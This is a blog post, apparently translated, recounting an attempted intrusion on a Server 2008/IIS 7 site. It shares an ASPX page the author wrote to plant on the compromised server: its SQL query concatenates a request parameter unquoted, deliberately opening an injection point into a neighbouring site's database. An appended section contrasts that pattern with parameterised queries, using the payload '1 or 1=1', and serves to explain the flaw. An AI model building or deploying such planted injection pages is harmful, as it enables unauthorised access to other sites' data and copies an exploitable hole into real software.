Yesterday I looked at a site with 4z1. Privilege escalation was really hard; we spent a full five hours on it with no result. Server 2008 + IIS 7, no sa, no root, none of the usual services...
Along the way we needed an ASPX page that constructs an injection point to get across to another site (跨站). I found a pile of code online and not one piece of it worked.
It isn't much code, so I just wrote one myself. So annoying.
<%@ Page Language="C#" AutoEventWireup="true" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script language="c#" runat="server">
    // Runs before the page renders. The SQL statement is deliberately built by string
    // concatenation so that the xxser query-string parameter becomes an injection point.
    void Page_Init(object sender, EventArgs e)
    {
        System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
        // "连接名" is the name of a <connectionStrings> entry in web.config
        conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;
        conn.Open();

        string i = this.Page.Request.Params["xxser"]; // the parameter: ?xxser=1

        // [表] / 列名: the table and column to query. i is concatenated unquoted, so
        // whatever is passed in xxser is executed as part of the statement.
        System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名 = " + i, conn);
        int x = command.ExecuteNonQuery(); // returns -1 for a SELECT; a bad statement throws and the error is shown
        Response.Write(i + "\n");
        Response.Write(x);
        conn.Close();
    }
</script>
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
    </div>
    </form>
</body>
</html>
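Added example, not code from the post above: the page works because the request parameter is glued straight into the SQL text, which is exactly the bug that makes a real application injectable. This console program builds the same kind of SqlCommand beside a parameterised one and shows what each does with a few inputs. The table name "users", column "id", parameter "@id" and the sample inputs are placeholders I chose; no database is opened, the commands are only constructed and inspected, so it runs without SQL Server (System.Data.SqlClient is in the .NET Framework, or the NuGet package of the same name on .NET Core).

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added example (not the original post's code). Table/column/parameter names are
// placeholders; the connection is never opened, so nothing here touches a server.
static class InjectionDemo
{
    // The page's pattern: the request value becomes part of the statement text.
    public static SqlCommand BuildConcatenated(SqlConnection conn, string xxser)
    {
        return new SqlCommand("select * from [users] where id = " + xxser, conn);
    }

    // The hardened form: the value travels as a typed parameter, never as SQL text.
    // int.Parse throws for anything that is not a plain integer, so "1 or 1=1" is
    // rejected before any SQL is ever sent.
    public static SqlCommand BuildParameterized(SqlConnection conn, string xxser)
    {
        var cmd = new SqlCommand("select * from [users] where id = @id", conn);
        cmd.Parameters.Add("@id", SqlDbType.Int).Value = int.Parse(xxser);
        return cmd;
    }

    static void Main()
    {
        // constructed sample inputs: a normal id and a tautology payload
        string[] inputs = { "1", "1 or 1=1" };

        using (var conn = new SqlConnection()) // never opened; inspection only
        {
            foreach (var input in inputs)
            {
                var bad = BuildConcatenated(conn, input);
                Console.WriteLine("concatenated : " + bad.CommandText);

                try
                {
                    var good = BuildParameterized(conn, input);
                    Console.WriteLine("parameterised: " + good.CommandText
                        + "   @id = " + good.Parameters["@id"].Value);
                }
                catch (FormatException)
                {
                    Console.WriteLine("parameterised: rejected '" + input + "' (not an integer)");
                }
            }
        }
    }
}
```

For "1" both commands describe the same query; for "1 or 1=1" the concatenated CommandText becomes select * from [users] where id = 1 or 1=1, which matches every row, while the parameterised builder refuses the value outright. If the column were a string the same separation holds: the payload would sit in an SqlParameter of type NVarChar as a literal value instead of altering the statement.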